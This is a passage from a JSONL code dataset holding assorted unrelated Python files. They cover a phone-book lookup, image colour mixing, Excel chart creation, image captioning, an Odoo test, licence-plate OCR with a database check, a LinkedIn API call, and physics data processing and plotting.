range(len(phoneBook)):\r\n if wantName in phoneBook[i]: # 찾고싶은 이름이 전화번호책에 있다면,\r\n if wantName == phoneBook[i][0]:\r\n finding += 1 # 찾고싶은 이름을 찾으면 finding에 1을 더하여 저장\r\n print(wantName, \"의 전화번호는 \", phoneBook[i][1], \"입니다.\") \r\n else: # 찾고싶은 이름이 전화번호책에 없다면.\r\n finding == 0 # 찾고싶은 이름을 찾지못하면 finding은 0\r\n if finding == 0: # finding == 0이면 등록되지 않은 이름.\r\n print(wantName, \"는 등록되지 않았습니다.\")\r\n \r\n \r\n","sub_path":"김대겸 (10).py","file_name":"김대겸 (10).py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"197738998","text":"import numpy as np\n\n\ndef colormix(img, color='r, g, b', scale=[1], clim=[0,1], plot_flag=0):\n s = img.shape\n assert len(s) >= 2, 'colormix: need 3D image to convert rgb'\n num_channel = s[0] \n\n color = color.replace(' ','')\n color = color.replace(';', ',')\n color = color.split(',') \n if len(color) < num_channel:\n color = ['r', 'g', 'b', 'c', 'p', 'y']\n color = color[:num_channel]\n color_vec = convert_rgb_vector(color)\n\n if len(scale) == 1 or len(scale) != num_channel:\n scale = np.ones(len(s))\n\n img_color = img.copy() \n img_color = (img_color - clim[0]) / (clim[1] - clim[0])\n for i in range(num_channel):\n img_color[i] *= scale[i]\n\n img_color = convert_rgb_img(img_color, color_vec)\n if plot_flag:\n plt.figure()\n plt.imshow(img_color)\n return img_color\n\n\ndef convert_rgb_vector(color):\n n = len(color)\n vec = np.zeros([n, 3])\n for i in range(n):\n if color[i] == 'r': vec[i] = [1, 0, 0]\n if color[i] == 'g': vec[i] = [0, 1, 0] \n if color[i] == 'b': vec[i] = [0, 0, 1]\n if color[i] == 'c': vec[i] = [0, 1, 1] \n if color[i] == 'p': vec[i] = [1, 0, 1] \n if color[i] == 'y': vec[i] = [1, 1, 0]\n return vec \n\n\ndef convert_rgb_img(img, color_vec):\n s = img.shape\n assert len(s) >= 2, 'need 3D image to convert rgb'\n img_color = np.zeros([s[1], s[2], 3])\n cR, cG, cB = 0, 0, 0\n for i in range(s[0]):\n cR += img[i] * color_vec[i][0]\n cG += img[i] * color_vec[i][1]\n cB += img[i] * color_vec[i][2]\n img_color[:, :, 0] = cR\n img_color[:, :, 1] = cG\n img_color[:, :, 2] = cB\n return img_color\n\n\n\n\n\n\n\n\n","sub_path":"pyxas/colormix.py","file_name":"colormix.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"62511853","text":"# import xlsxwriter module \r\nimport xlsxwriter \r\n\r\n# Workbook() takes one, non-optional, argument \r\n# which is the filename that we want to create. \r\nworkbook = xlsxwriter.Workbook('chart_pie.xlsx') \r\n\r\n# The workbook object is then used to add new \r\n# worksheet via the add_worksheet() method. \r\nworksheet = workbook.add_worksheet() \r\n\r\n# Create a new Format object to formats cells \r\n# in worksheets using add_format() method . \r\n\r\n# here we create bold format object . \r\nbold = workbook.add_format({'bold': 1}) \r\n\r\n# create a data list . \r\nheadings = ['Category', 'Values'] \r\n\r\ndata = [ \r\n\t['Apple', 'Cherry', 'Pecan'], \r\n\t[60, 30, 10], \r\n] \r\n\r\n# Write a row of data starting from 'A1' \r\n# with bold format. \r\nworksheet.write_row('A1', headings, bold) \r\n\r\n# Write a column of data starting from \r\n# A2, B2, C2 respectively. \r\nworksheet.write_column('A2', data[0]) \r\nworksheet.write_column('B2', data[1]) \r\n\r\n# Create a chart object that can be added \r\n# to a worksheet using add_chart() method. \r\n\r\n# here we create a pie chart object . \r\nchart1 = workbook.add_chart({'type': 'pie'}) \r\n\r\n# Add a data series to a chart \r\n# using add_series method. \r\n# Configure the first series. \r\n#[sheetname, first_row, first_col, last_row, last_col]. \r\nchart1.add_series({ \r\n\t'name':\t 'Pie sales data', \r\n\t'categories': ['Sheet1', 1, 0, 3, 0], \r\n\t'values':\t ['Sheet1', 1, 1, 3, 1], \r\n}) \r\n\r\n# Add a chart title \r\nchart1.set_title({'name': 'Popular Pie Types'}) \r\n\r\n# Set an Excel chart style. Colors with white outline and shadow. \r\nchart1.set_style(10) \r\n\r\n# Insert the chart into the worksheet(with an offset). \r\n# the top-left corner of a chart is anchored to cell C2. \r\nworksheet.insert_chart('C2', chart1, {'x_offset': 25, 'y_offset': 10}) \r\n\r\n# Finally, close the Excel file \r\n# via the close() method. \r\nworkbook.close() \r\n","sub_path":"draw pie chart.py","file_name":"draw pie chart.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"288521507","text":"import torch\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport argparse\nimport pickle \nimport os\nimport csv\nfrom torchvision import transforms \nfrom build_vocab import Vocabulary\nfrom model import EncoderCNN, DecoderRNN\nfrom PIL import Image\n\n\n# Device configuration\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef load_image(image_path, transform=None):\n image = Image.open(image_path).convert('RGB')\n image = image.resize([224, 224], Image.LANCZOS)\n \n if transform is not None:\n image = transform(image).unsqueeze(0)\n \n return image\n\ndef main(args):\n # Image preprocessing\n transform = transforms.Compose([\n transforms.ToTensor(), \n transforms.Normalize((0.485, 0.456, 0.406), \n (0.229, 0.224, 0.225))])\n \n # Load vocabulary wrapper\n with open(args.vocab_path, 'rb') as f:\n vocab = pickle.load(f)\n\n # Build models\n encoder = EncoderCNN(args.embed_size).eval() # eval mode (batchnorm uses moving mean/variance)\n decoder = DecoderRNN(args.embed_size, args.hidden_size, len(vocab), args.num_layers)\n encoder = encoder.to(device)\n decoder = decoder.to(device)\n\n # Load the trained model parameters\n encoder.load_state_dict(torch.load(args.encoder_path))\n decoder.load_state_dict(torch.load(args.decoder_path))\n\n words = ['person',\n 'bicycle',\n 'car',\n 'motorcycle',\n 'airplane',\n 'bus',\n 'train',\n 'truck',\n 'boat',\n 'traffic light',\n 'fire hydrant',\n 'stop sign',\n 'parking meter',\n 'bench',\n 'bird',\n 'cat',\n 'dog',\n 'horse',\n 'sheep',\n 'cow',\n 'elephant',\n 'bear',\n 'zebra',\n 'giraffe',\n 'backpack',\n 'umbrella',\n 'handbag',\n 'tie',\n 'suitcase',\n 'frisbee',\n 'skis',\n 'snowboard',\n 'sports ball',\n 'kite',\n 'baseball bat',\n 'baseball glove',\n 'skateboard',\n 'surfboard',\n 'tennis racket',\n 'bottle',\n 'wine glass',\n 'cup',\n 'fork',\n 'knife',\n 'spoon',\n 'bowl',\n 'banana',\n 'apple',\n 'sandwich',\n 'orange',\n 'broccoli',\n 'carrot',\n 'hot dog',\n 'pizza',\n 'donut',\n 'cake',\n 'chair',\n 'couch',\n 'potted plant',\n 'bed',\n 'dining table',\n 'toilet',\n 'tv',\n 'laptop',\n 'mouse',\n 'remote',\n 'keyboard',\n 'cell phone',\n 'microwave',\n 'oven',\n 'toaster',\n 'sink',\n 'refrigerator',\n 'book',\n 'clock',\n 'vase',\n 'scissors',\n 'teddy bear',\n 'hair drier',\n 'toothbrush']\n\n # Prepare images\n if args.images:\n\n # inputs path\n input_path = os.listdir(args.images)\n sentences = []\n\n # folders in inputs\n for path in input_path:\n file_path = args.images+path+'/'\n if os.path.isdir(file_path):\n files = os.listdir(file_path)\n # files in folders\n for file in files:\n\n image = load_image(file_path+file, transform)\n image_tensor = image.to(device)\n\n # Generate an caption from the image\n feature = encoder(image_tensor)\n sampled_ids = decoder.sample(feature)\n sampled_ids = sampled_ids[0].cpu().numpy() # (1, max_seq_length) -> (max_seq_length)\n\n # Convert word_ids to words\n sampled_caption = []\n for word_id in sampled_ids:\n word = vocab.idx2word[word_id]\n sampled_caption.append(word)\n if word == '':\n break\n caption = ' '.join(sampled_caption)[8:-6]\n sentences.append(caption)\n for word in words:\n if word in caption:\n f = open('captions2.csv', 'a', encoding='utf-8', newline=\"\")\n writer = csv.writer(f)\n writer.writerow([file_path+file, word, caption])\n f.close()\n \n # Print out the image and the generated caption\n # for s in sentences:\n # print(s)\n\n # Prepare an image\n else:\n image = load_image(args.image, transform)\n image_tensor = image.to(device)\n\n found_words = []\n\n # Generate an caption from the image\n feature = encoder(image_tensor)\n sampled_ids = decoder.sample(feature)\n sampled_ids = sampled_ids[0].cpu().numpy() # (1, max_seq_length) -> (max_seq_length)\n\n # Convert word_ids to words\n sampled_caption = []\n for word_id in sampled_ids:\n word = vocab.idx2word[word_id]\n sampled_caption.append(word)\n if word == '':\n break\n sentence = ' '.join(sampled_caption)\n\n for word in words:\n if word in sentence:\n found_words.append(word)\n\n if 'hot dog' in sentence:\n found_words.remove('dog')\n\n return sentence, found_words\n # Print out the image and the generated caption\n # print(sentence)\n\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--image', type=str, help='input image for generating caption')\n parser.add_argument('--images', type=str, help='input image directory for generating caption')\n parser.add_argument('--encoder_path', type=str, default='models/encoder-5-3000.pkl', help='path for trained encoder')\n parser.add_argument('--decoder_path', type=str, default='models/decoder-5-3000.pkl', help='path for trained decoder')\n parser.add_argument('--vocab_path', type=str, default='data/vocab.pkl', help='path for vocabulary wrapper')\n \n # Model parameters (should be same as paramters in train.py)\n parser.add_argument('--embed_size', type=int , default=256, help='dimension of word embedding vectors')\n parser.add_argument('--hidden_size', type=int , default=512, help='dimension of lstm hidden states')\n parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm')\n args = parser.parse_args()\n main(args)\n","sub_path":"models/pyflask/image_captioning/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"80656978","text":"# -*- coding: utf-8 -*-\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\n# from odoo.tests.common import SavepointCase\n# from odoo.addons.pos_survey.tests.test_data import TestData\n#\n# from odoo import fields\n# import logging\n# _logger = logging.getLogger(__name__)\n# import odoo\n# import odoo.tests\n# @odoo.tests.common.at_install(False)\n# @odoo.tests.common.post_install(True)\n\n# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\n# from odoo.addons.account.tests.account_test_classes import AccountingTestCase\nfrom odoo.tests.common import TransactionCase\n\n\n# class test_res_partner(TransactionCase):\n\nclass ClosePosSession(TransactionCase):\n \n def test_close_pos_session(self):\n user_id = self.env['res.users'].create({\n 'name':'test user',\n 'login':'a',\n 'compnay_id':1\n })\n servey_id = self.env['survey.survey'].create({\n 'title':'Test Servey'\n })\n session_id = self.env['pos.session'].create({\n 'user_id':user_id.id,\n 'config_id':1\n })\n account_journal_id = self.env['account.journal'].create({\n 'name': 'bank',\n 'type': 'sale',\n 'code': 'Bank'\n })\n servey_user_input_id = self.env['survey.user_input'].create({\n 'survey_id':servey_id.id,\n 'session_id':session_id.id,\n })\n servey_quetion_id = self.env['survey.question'].create({\n 'question':'Test Quetion',\n 'survey_id':servey_id.id,\n 'journal_ids':[(6, 0, [session_id.statement_ids.journal_id.id])],\n 'page_id':1\n })\n\n #write method flow of servey.user_input\n if servey_user_input_id.state == 'done':\n if servey_user_input_id.session_id and servey_user_input_id.session_id.state != 'closed':\n session_id.action_pos_session_closing_control()\n session_id.action_pos_session_close()\n\n # action servey user input method flow\n user_input = self.env['survey.user_input'].browse(servey_user_input_id.id)\n questions_to_fill = self.env['survey.question'].search([('survey_id', '=', servey_id.id),('journal_ids', '!=', False)])\n for question in questions_to_fill:\n for journal in question.journal_ids :\n if journal.id in session_id.statement_ids.mapped('journal_id').mapped('id') :\n statement = session_id.statement_ids.filtered(lambda x : x.journal_id.id == journal.id)\n vals = {\n 'user_input_id': user_input.id,\n 'question_id': question.id,\n 'page_id': question.page_id.id,\n 'survey_id': question.survey_id.id,\n 'skipped': False,\n 'answer_type' : 'number',\n 'value_number' : statement.total_entry_encoding\n }\n user_input_line = self.env['survey.user_input_line'].search([('user_input_id', '=', servey_user_input_id.id),('question_id', '=', servey_quetion_id.id)])\n if not user_input_line :\n new_user_input_id = self.env['survey.user_input_line'].create(vals)\n self.assertEqual(new_user_input_id.question_id.id,question.id)\n self.assertEqual(new_user_input_id.survey_id.id, question.survey_id.id)\n print (\"\\n\\n\\ Automated Test Succesfully Run\")\n else : #updatebecause session could have been updated\n user_input_line.write(vals)","sub_path":"pos_survey/tests/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"262867857","text":"\n# Main\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport imutils\nimport easyocr, pytesseract\nimport time\nfrom tkinter import filedialog\nfrom tkinter import *\nimport mysql.connector, sys, os\nfrom mysql.connector import Error\n\ndef fetchFromDB(number):\n try:\n connection = mysql.connector.connect(host='localhost',\n database='alpr',\n user='root',\n password=str(os.environ.get('Pass')))\n cursor = connection.cursor(dictionary=True)\n sql_fetch_query = \"\"\"select * from license_plates where PlateNumber=%s\"\"\"\n cursor.execute(sql_fetch_query, (number,))\n records = cursor.fetchone()\n # print(records)\n # print(len(records))\n if(records!=None or len(records)>0):\n print(f'Number verified :) ')\n else:\n print(\"Number NOT verified :( \")\n except Error as e:\n print(\"Error reading data from MySQL table\", e)\n finally:\n if (connection.is_connected()):\n cursor.close()\n connection.close()\n print(\"MySQL connection is closed\")\n return\n\n\nif __name__ == \"__main__\":\n # initialise\n pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'\n\n # To take image using gui\n root = Tk()\n root.title(\"MINI PROJECT\")\n\n string = filedialog.askopenfilename(initialdir=\"D:/code/ALPR/Images\",\n title=\"Select A File\")\n\n # load image as an object\n img = cv.imread(string)\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n # plt.imshow(cv.cvtColor(gray, cv.COLOR_BGR2RGB))\n cv.imshow('Frame3', gray)\n cv.waitKey(100)\n\n # basically bilateralFilter(img, d, sigmacolor, sigmaSpace, borderType)\n bfilter = cv.bilateralFilter(gray, 15, 15, 15) #Noise reduction\n cv.imshow('Frame3', bfilter)\n cv.waitKey(100)\n\n # canny uses hystersis thresholding\n edged = cv.Canny(bfilter, 30, 255) #Edge detection\n # edged = cv.Canny(gray, 30, 200)\n\n #plt.imshow(cv.cvtColor(edged, cv.COLOR_BGR2RGB))\n cv.imshow('Frame3', edged)\n cv.waitKey(100)\n\n # RETR_TREE: Retrieves all of the\n # contours and reconstructs a full hierarchy of nested contours.\n # CHAIN_APPROX_SIMPLE compresses horizontal, vertical,\n # and diagonal segments and leaves only their end points.\n keypoints = cv.findContours(edged.copy(), cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n contours = imutils.grab_contours(keypoints)\n contours = sorted(contours, key=cv.contourArea, reverse=True)[:10]\n\n # img1 = cv.drawContours(edged, [contours[8]], 0, 255, -1)\n # cv.imshow('Frame3', img1)\n # cv.waitKey(6000)\n\n print(\"Contour length:\", len(contours))\n\n location = None\n # for contour in contours:\n # approx = cv.approxPolyDP(contour, 10, True) # (cont, resolution, closed/open)\n # if len(approx) == 4:\n # location = approx\n # break\n\n for contour in contours:\n # epsilon : Parameter specifying the approximation accuracy.\n # epsilon : This is the maximum distance between the original curve and its approximation\n approx = cv.approxPolyDP(contour, 10, True) # (cnt, epsilon, closed)\n \"\"\"Can add condition for rectangle (basis of length & breadth)\"\"\"\n if len(approx) == 4 and 100 < cv.contourArea(contour):\n location = approx\n img1 = cv.drawContours(edged, [contour], 0, 255, -1)\n cv.imshow('Frame3', img1)\n cv.waitKey(100)\n break\n\n # for contour in contours:\n # approx = cv.approxPolyDP(contour, 10, True)\n # \"\"\"Can add condition for rectangle (basis of length & breadth) IMP \"\"\"\n # if len(approx) == 4:\n # location = approx\n # img1 = cv.drawContours(edged, [contour], 0, 255, -1)\n # cv.imshow('Frame3', img1)\n # cv.waitKey(100)\n\n\n mask = np.zeros(gray.shape, np.uint8)\n new_image = cv.drawContours(mask, [location], 0, 255, -1)\n cv.imshow('Frame3', new_image)\n cv.waitKey(100)\n\n new_image = cv.bitwise_and(img, img, mask=mask)\n cv.imshow('Frame3', new_image)\n cv.waitKey(100)\n\n #plt.imshow(cv.cvtColor(new_image, cv.COLOR_BGR2RGB))\n\n (x, y) = np.where(mask == 255)\n (x1, y1) = (np.min(x), np.min(y))\n (x2, y2) = (np.max(x), np.max(y))\n cropped_image = gray[x1:x2+1, y1:y2+1]\n cv.imshow('Frame3', cropped_image)\n cv.waitKey(1000)\n\n #plt.imshow(cv.cvtColor(cropped_image, cv.COLOR_BGR2RGB))\n\n # For tesseract\n result = pytesseract.image_to_string(cropped_image)\n # print(result)\n\n # for tessearct\n text = result\n\n # Strip off the spaces & unwanted chars present in between characters\n text = text.replace(\" \", \"\")\n text = text.strip()\n text = re.sub('[\\W_]+', '', text)\n\n # Check with the DB\n fetchFromDB(text)\n\n # text = result[0][-2]\n font = cv.FONT_HERSHEY_SIMPLEX\n res = cv.putText(img, text=text, org=(approx[0][0][0], approx[1][0][1]+60),\n fontFace=font, fontScale=1, color=(0, 255, 0), thickness=2,\n lineType=cv.LINE_AA)\n res = cv.rectangle(img, tuple(approx[0][0]), tuple(approx[2][0]), (0, 255, 0), 3)\n #plt.imshow(cv.cvtColor(res, cv.COLOR_BGR2RGB))\n\n # show the frame with number\n cv.imshow('Frame3', res)\n cv.waitKey(4000)\n\n print(\"Text: \", text)","sub_path":"Roughbook_tesseract.py","file_name":"Roughbook_tesseract.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"559765212","text":"from voxsup.api.client.linkedin import LinkedInClient as Client\naccount_id = 500735271 # VoxSup Inc\nclient = Client(context={'account_id': account_id})\nenable_requests_logging()\n\nbody = {\n \"patch\": {\n \"$set\": {\n \"htmlBody\": \"Hi I'm Joe\"\n }\n }\n}\nresponse = client.post('adInMailContentsV2/1120974', json=body)\nresponse.json()\n","sub_path":"linkedin/liEditHtmlBodyTest.py","file_name":"liEditHtmlBodyTest.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"184887017","text":"\"\"\" \nNKT13 processor \n\nARGV \n==== \n1) \t\tElemental symbol \n\"\"\" \n\nimport sys \nimport os \n\nz_dirs = {\n\t0: \t\t\t\"FeH-inf\", \n\t0.001: \t\t\"FeH-1p15\", \n\t0.004: \t\t\"FeH-0p54\", \n\t0.008: \t\t\"FeH-0p24\", \n\t0.02: \t\t\"FeH0p15\", \n\t0.05: \t\t\"FeH0p55\" \n}\n\ndef get_yields(filestream): \n\tline = filestream.readline() \n\twhile not line.startswith(\"M \"): \n\t\tline = filestream.readline() \n\t# line = filestream.readline() \n\tmasses = [float(i) for i in line.split()[1:]] \n\twhile not line.startswith(sys.argv[1]): \n\t\tline = filestream.readline() \n\tisotopes = [] \n\tyields = [] \n\twhile line.startswith(sys.argv[1]) and line != \"\": \n\t\tisotopes.append(\"%s%d\" % (sys.argv[1], int(line.split()[1]))) \n\t\tyields.append([float(i) for i in line.split()[2:]]) \n\t\tline = f.readline() \n\t\tprint(line) \n\t# yields = [list(i) for i in zip(masses, yields)] \n\t# print(yields) \n\t# print(len(yields)) \n\treturn [masses, isotopes, yields] \n\n\ndef write_yields(outstream, masses, isotopes, yields): \n\toutstream.write(\"# Units are Msun\\n\") \n\toutstream.write(\"# M_init\\t\") \n\tfor i in isotopes: \n\t\toutstream.write(\"%s\\t\" % (i.lower())) \n\toutstream.write(\"\\n8\\t\")\n\tfor i in isotopes: \n\t\toutstream.write(\"0\\t\") \n\toutstream.write(\"\\n\") \n\tfor i in range(len(masses)): \n\t\tif masses[i] > 8: \n\t\t\toutstream.write(\"%g\\t\" % (masses[i])) \n\t\t\tfor j in range(len(isotopes)): \n\t\t\t\t outstream.write(\"%e\\t\" % (yields[j][i])) \n\t\t\toutstream.write(\"\\n\") \n\t\telse: \n\t\t\tcontinue \n\toutstream.close() \n\n\nif __name__ == \"__main__\": \n\twith open(\"ck13.dat\", 'r') as f: \n\t\tfor i in z_dirs.keys(): \n\t\t\tmasses, isotopes, yields = get_yields(f) \n\t\t\twith open(\"%s/v0/%s.dat\" % (z_dirs[i], sys.argv[1].lower()), \n\t\t\t\t'w') as out: \n\t\t\t\twrite_yields(out, masses, isotopes, yields) \n\t\tf.close() \n\n","sub_path":"vice/yields/ccsne/NKT13/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"599485551","text":"'''\nPlot mean and width of s vs pt for Lyon and Caltech MC and MC truth\n Usage: python -i frp_caltech_vs_lyon.py\n'''\n\nimport JPsi.MuMu.common.canvases as canvases\nfrom JPsi.MuMu.escale.fitResultPlotter import FitResultPlotter\nfrom JPsi.MuMu.common.binedges import BinEdges\nfrom JPsi.MuMu.common.basicRoot import *\nfrom JPsi.MuMu.common.roofit import *\nfrom JPsi.MuMu.escale.lyondata import data_2011_09_23_confID155805 as lyon\nfrom JPsi.MuMu.scaleFitter import subdet_r9_categories\n\ngStyle.SetPadTopMargin(0.1)\ncanvases.wwidth = 400\ncanvases.wheight = 400\ncanvases.yperiod = 10\n\nfilename = '/raid2/veverka/esFitResults/mc_sreco_strue_Baseline_V1.root'\nfilename = '/Users/veverka/Work/Talks/11-11-04/mc_sreco_strue_Baseline_V1.root'\nfilename = '/Users/veverka/Work/Talks/11-11-09/Baseline_mod1/mc_sreco_strue_Baseline_mod1.root'\n\nplotters = []\n\n## Configuration for plots vs Pt\nbinedges = list(BinEdges([10, 12, 15, 20, 25, 30, 100]))\nbincenters = [0.5*(lo + hi)\n for lo, hi in BinEdges([10, 12, 15, 20, 25, 30, 50])]\nbinhalfwidths = [0.5*(hi - lo)\n for lo, hi in BinEdges([10, 12, 15, 20, 25, 30, 50])]\nn = len(binedges)\n# binhalfwidths = [0] * n\n\ndef var_vs_pt(name):\n \"\"\"Returns functions that take a workspaces ws and return\n x, y, ex, ey where y and ey correspond to workspace\n variable of a given name and x and ex are pt bins.\"\"\"\n return (\n lambda ws, i = iter(bincenters): i.next(), # x\n lambda ws: ws.var(name).getVal(), # y\n lambda ws, i = iter(binhalfwidths): i.next(), # ex\n lambda ws: ws.var(name).getError(), # ey\n )\n\ncategories = 'EB_lowR9 EB_highR9 EE_lowR9 EE_highR9'.split()\nlyonmc = lyon['mc']\n\nclass Config():\n \"\"\"Holds fitResultPlotter configuration data.\"\"\"\n def __init__(self, **kwargs):\n for name, value in kwargs.items():\n setattr(self, name, value)\n## end of Config\n\ncfgs = [\n ###########################################################################\n ## EB, R9 < 0.94, mmMass < 80 GeV, mmgMass in [87.2, 95.2]\n Config(\n ## Used to pick the right Lyon data and in canvas name\n name = 'EB_lowR9',\n ## Used in canvas title\n title = 'Barrel, R_{9} < 0.94, Baseline Selection, POWHEG S4',\n filenames = [filename] * n,\n wsnames = ('ws1',) * n,\n sreco_snapshots = ['sFit_sreco_mc_cbShape_mmMass80_EB_lowR9_PhoEt%d-%d'\n % (lo, hi) for lo, hi in binedges],\n ## MC truth scale\n strue_snapshots = ['sFit_strue_mc_bifurGauss_mmMass80_EB_lowR9_'\n 'PhoEt%d-%d' % (lo, hi) for lo, hi in binedges],\n ),\n ###########################################################################\n ## EB, R9 > 0.94, mmMass < 80 GeV, mmgMass in [87.2, 95.2]\n Config(\n ## Used to pick the right Lyon data and in canvas name\n name = 'EB_highR9',\n ## Used in canvas title\n title = 'Barrel, R_{9} > 0.94, Baseline Selection, POWHEG S4',\n filenames = [filename] * n,\n wsnames = ('ws1',) * n,\n sreco_snapshots = ['sFit_sreco_mc_cbShape_mmMass80_EB_highR9_PhoEt%d-%d'\n % (lo, hi) for lo, hi in binedges],\n ## MC truth scale\n strue_snapshots = ['sFit_strue_mc_bifurGauss_mmMass80_EB_highR9_'\n 'PhoEt%d-%d' % (lo, hi) for lo, hi in binedges],\n ),\n ###########################################################################\n ## EE, R9 < 0.95, mmMass < 80 GeV, mmgMass in [87.2, 95.2]\n Config(\n ## Used to pick the right Lyon data and in canvas name\n name = 'EE_lowR9',\n ## Used in canvas title\n title = 'Endcaps, R_{9} < 0.95, Baseline Selection, POWHEG S4',\n filenames = [filename] * n,\n wsnames = ('ws1',) * n,\n sreco_snapshots = ['sFit_sreco_mc_cbShape_mmMass80_EE_lowR9_PhoEt%d-%d'\n % (lo, hi) for lo, hi in binedges],\n ## MC truth scale\n strue_snapshots = ['sFit_strue_mc_bifurGauss_mmMass80_EE_lowR9_'\n 'PhoEt%d-%d' % (lo, hi) for lo, hi in binedges],\n ),\n ###########################################################################\n ## EE, R9 > 0.95, mmMass < 80 GeV, mmgMass in [87.2, 95.2]\n Config(\n ## Used to pick the right Lyon data and in canvas name\n name = 'EE_highR9',\n ## Used in canvas title\n title = 'Endcaps, R_{9} > 0.95, Baseline Selection, POWHEG S4',\n filenames = [filename] * n,\n wsnames = ('ws1',) * n,\n sreco_snapshots = ['sFit_sreco_mc_cbShape_mmMass80_EE_highR9_PhoEt%d-%d'\n % (lo, hi) for lo, hi in binedges],\n ## MC truth scale\n strue_snapshots = ['sFit_strue_mc_bifurGauss_mmMass80_EE_highR9_'\n 'PhoEt%d-%d' % (lo, hi) for lo, hi in binedges],\n ),\n]\n\n\nfor cfg in cfgs:\n #------------------------------------------------------------------------------\n ## Scale Comparison\n ## Lyon\n frp = FitResultPlotter(\n sources = zip(cfg.filenames, cfg.wsnames, cfg.sreco_snapshots),\n getters = (\n lambda ws, i = iter(bincenters): i.next(), # x\n lambda ws, i = iter(lyonmc[cfg.name]['sreco']): i.next(), # y\n lambda ws, i = iter(binhalfwidths): i.next(), # ex\n lambda ws, i = iter(lyonmc[cfg.name]['esreco']): i.next(), # ey\n ),\n xtitle = 'E_{T}^{#gamma} (GeV)',\n ytitle = 's_{reco} = E^{#gamma}_{reco}/E^{kin}_{reco} - 1 (%)',\n title = 'Lyon',\n )\n frp.getdata()\n frp.makegraph()\n\n ## Caltech\n frp.getters = var_vs_pt('#Deltas')\n frp.title = 'Caltech'\n frp.getdata()\n frp.makegraph()\n\n ## True\n frp.sources = zip(cfg.filenames, cfg.wsnames, cfg.strue_snapshots)\n frp.getters = var_vs_pt('#Deltas')\n frp.title = 'MC Truth'\n frp.getdata()\n frp.makegraph()\n\n ## Compare Caltech, Lyon and MC truth scale\n canvases.next('s_' + cfg.name).SetGrid()\n frp.plotall(title = cfg.title,\n styles = [20, 25, 22],\n colors = [kBlue, kRed, kBlack])\n\n plotters.append(frp)\n\n #------------------------------------------------------------------------------\n ## S width Comparison\n ## Lyon\n frp = FitResultPlotter(\n sources = zip(cfg.filenames, cfg.wsnames, cfg.sreco_snapshots),\n getters = (\n lambda ws, i = iter(bincenters): i.next(), # x\n lambda ws, i = iter(lyonmc[cfg.name]['sigma']): i.next(), # y\n lambda ws, i = iter(binhalfwidths): i.next(), # ex\n lambda ws, i = iter(lyonmc[cfg.name]['esigma']): i.next(), # ey\n ),\n xtitle = 'E_{T}^{#gamma} (GeV)',\n ytitle = '#sigma(s_{reco}) (%)',\n title = 'Lyon',\n )\n frp.getdata()\n frp.makegraph()\n\n ## Caltech\n frp.getters = var_vs_pt('#sigma')\n frp.title = 'Caltech'\n frp.getdata()\n frp.makegraph()\n\n ## Compare Caltech and Lyon s width\n canvases.next('sigma_' + cfg.name).SetGrid()\n frp.plotall(title = cfg.title,\n styles = [20, 25])\n\n plotters.append(frp)\n## end of loop over cfgs\n\n\n\n################################################################################\n## Plot the p-values of the MC true fits\nfilenames = [filename] * n\nworkspaces = ['ws1'] * n\nsnapshot = 'chi2_strue_mc_bifurGauss_mmMass80_%s_PhoEt%d-%d_iter0'\ncats = list(subdet_r9_categories)\n\nfrp = FitResultPlotter(\n sources = zip([filename] * n,\n ['ws1'] * n,\n [snapshot % ('EB_highR9', lo, hi) for lo, hi in binedges]),\n getters = var_vs_pt('chi2Prob'),\n xtitle = 'E_{T}^{#gamma} (GeV)',\n ytitle = 'p-value',\n title = 'Barrel, R_{9}^{#gamma} < 0.94',\n )\n\nfor icat in cats:\n frp.sources = zip(filenames, workspaces,\n [snapshot % (icat.name, lo, hi) for lo, hi in binedges])\n frp.getters = var_vs_pt('chi2Prob')\n frp.title = ', '.join(icat.labels)\n frp.getdata()\n frp.makegraph()\n\ncanvases.next('strue_pvalues_vs_phoEt')\nfrp.plotall(title = 'MC Truth Fits')\nplotters.append(frp)\n\n## Make the distribution of the p-values\nhist = frp.histogramall(\n name = 'h_strue_pvalues',\n title = 's_{true} = E^{#gamma}_{reco}/E^{#gamma}_{gen};p-value;Fits',\n nbins = 5, xlow = 0, xhigh = 1\n )\ncanvases.next('strue_pvalues_distro')\nhist.Draw('e0')\nplotters.append(hist)\n\n################################################################################\n## Plot the p-values of the reco s-Fits fits\nfilenames = [filename] * n\nworkspaces = ['ws1'] * n\nsnapshot = 'chi2_sreco_mc_cbShape_mmMass80_%s_PhoEt%d-%d_iter0'\n\nfrp = FitResultPlotter(\n sources = zip([filename] * n,\n ['ws1'] * n,\n [snapshot % ('EB_highR9', lo, hi) for lo, hi in binedges]),\n getters = var_vs_pt('chi2Prob'),\n xtitle = 'E_{T}^{#gamma} (GeV)',\n ytitle = 'p-value',\n title = 'Barrel, R_{9}^{#gamma} > 0.94',\n )\n\nfor icat in cats:\n 